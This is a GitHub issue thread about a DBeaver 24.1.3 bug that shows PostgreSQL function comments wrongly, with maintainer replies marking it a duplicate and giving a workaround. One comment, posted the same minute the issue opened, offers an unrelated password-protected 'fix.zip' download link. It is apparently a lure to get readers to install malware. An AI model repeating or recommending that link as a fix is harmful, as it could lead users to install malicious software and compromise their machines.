### ISSUE TITLE
Bug introduced in v24.1.3 affecting displaying of SQL functions

### ISSUE THREAD

**Issue by btanner2** [dbeaver/dbeaver#35353] opened 2024-08-26 14:09 UTC
### Description

In version 24.1.3, a bug was introduced that affects the display of SQL functions. Attached is an image showing a function definition in 24.1.2 (everything is fine) and in 24.1.3 (incorrect comments). 

24.1.2
![24 1 2_sql_props](https://github.com/user-attachments/assets/de371b3e-55e0-4f4e-bb17-26ec8911b3e8)

24.1.3
![24 1 3_sql_props](https://github.com/user-attachments/assets/b0eb0329-c015-47d1-b574-e30535c692ba)

### DBeaver Version

24.1.3 - 24.1.5

### Database and driver

PostgreSQL

### Steps to reproduce

Just open the description of any function

**Comment by paozhuanis1** [comment] 2024-08-26 14:09
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by brankoradovanovic-mcom** [comment] 2024-08-27 07:45
Apparently this has just been fixed in #35202.

**Comment by E1izabeth** [comment] 2024-08-28 07:51
Thank you for report.
Duplicate of #34972

**Comment by E1izabeth** [comment] 2024-08-28 07:52
As a workaround, you can turn the setting `Enable semantic analysis` in `Preferences->Editors->SQL Editor->Code Editor`

![image](https://github.com/user-attachments/assets/02b9de1b-7663-465f-b97d-6665ba37b84e)

**Closed as not planned by E1izabeth** 2024-08-28 07:51 UTC
Labels: x:postgresql, duplicate, xf:metadata
